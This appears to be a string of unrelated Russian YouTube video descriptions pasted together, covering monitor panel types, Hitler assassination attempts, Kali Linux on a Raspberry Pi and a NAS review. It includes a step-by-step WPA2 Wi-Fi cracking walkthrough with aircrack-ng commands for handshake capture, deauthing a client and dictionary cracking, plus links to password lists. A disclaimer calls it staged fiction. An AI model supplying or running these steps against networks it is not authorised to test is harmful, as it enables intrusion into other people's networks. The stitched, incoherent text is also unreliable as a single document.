Монитор для профессионального гейминга, монитор для просмотра фильмов, монитор для обработки фото и видео, монитор для дизайнера, монитор для работы — рынок мониторов огромен, но за каждым скрывается вариация одной из трех технологий: TN, IPS и VA. В этом ролике выяснили, как выбрать монитор, у кого лучше цветопередача, скорость отклика, контрастность, глубина черного и углы обзора. Совсем немного теории и много наглядной практики. Чем отличаются матрицы — смотрите сами. Особенно, если вы выбираете универсальный, доступный монитор, за которым и поработать можно по удаленке, и вечером фильм посмотреть или поиграть.
00:00 Вступление
00:25 Технические особенности:
01:05 TN мониторы
01:27 IPS мониторы
01:47 VA мониторы
02:17 Где здесь TN, IPS и VA?
02:41 Углы обзора
03:50 Глубина черного, засветы
05:29 Цветопередача и контраст
06:23 Отклик
07:43 Вывод
Каким-то образом Гитлер пережил более 30 покушений на убийство, и, как известно, ни одно из них не состоялось вплоть до окончания Второй Мировой войны. В сегодняшнем выпуске мы рассмотрим некоторые из неудачных попыток, которые были так близки к реализации, но Гитлер все равно выходил сухим из воды.
Видео основано на общедоступной информации, если не указано иное.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…
Присоединяйтесь, друзья, там очень много всего интересного по ИБ и Kali Linux!
● В этом ролике: Я рассказываю о том, как установить Kali Linux на Raspberry Pi. Полноценный и привычный для нас Kali Linux, а не урезанную версию — как это предлагают все мануалы.
✓ Raspberry PI 3 B — тот самый Raspberry Pi: got.by/3an086
— ● В ролике «Установка Kali Linux на Raspberry Pi | UnderMind» — я рассказываю вам о том, как установить Kali Linux на Raspberry Pi 3 B. Но на самом деле таким образом можно установить Kali Linux не только на Raspberry Pi 3 B, а на любые другие версии Малинки. В этом видео я собрал огромное количество информации: начиная от того, как записать образ Linux на флешку, и заканчивая тем, как установить полноценную и привычную для нас рабочую среду с обычного настольного Kali Linux. Конечно, на Raspberry Pi можно установить и Debian Linux, и Ubuntu Linux, Linux Mint и т.д. но именно в этой сборке Kali Linux для Raspberry Pi уже модифицировано Linux Ядро (Kernel) таким образом, что для вас становится доступен режим монитора для встроенного WiFi адаптера и много чего еще. Так-же в этом ролике я рассказываю об удаленном управлении устройством через VNC сервер и через SSH.
● Кстати, Kali Linux — это обычная Операционная Система (ОС) для специалистов по защите информации. Эта ОС нигде не запрещена и есть в открытом доступе (не в даркнете). Все утилиты, которые в ней есть, предназначены для тестирования своих сетей и систем на защищенность. Автор ролика ни в коем случае не побуждает вас к созданию и использованию любого ПО в противозаконых целях! Данный ролик носит образовательный характер с точки зрения информационной безопасности, и призван повысить Вашу бдительность при обеспечении защиты информации.
● Данный ролик — художественный вымысел автора, монтаж, фотошоп и постанова. Всё рассказанное в ролике — является авторской выдумкой. Всё происходящее в видео — выполнено используя монтаж, и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения (ПО), названий ПО и либо каких-либо других продемонстрированных фактов и событий в ролике — не более чем совпадение и полная случайность.
Оснастка для измерения тока (Micsig CP2100A): ali.ski/CcAFbt
00:00 — Вступление
00:26 — Обзор Dashboard
01:42 — Системные настройки
04:48 — Настройки Storage
06:45 — Пул и датасеты
13:12 — Настройка прав доступа
14:11 — Snapshots и импорт данных
16:20 — Доступ к данным по сети
17:37 — Сервисы, плагины и контейнеры
22:35 — Графики (отчёты)
23:53 — Тесты на скорость работы NAS
30:17 — Осмотр хранилища внутри
32:54 — Замер тока при раскрутке HDD
34:20 — Взвешивание
34:38 — Энергопотребление
35:07 — Термограмма внутренностей
35:43 — Дополнение по системе охлаждения
37:29 — Заключение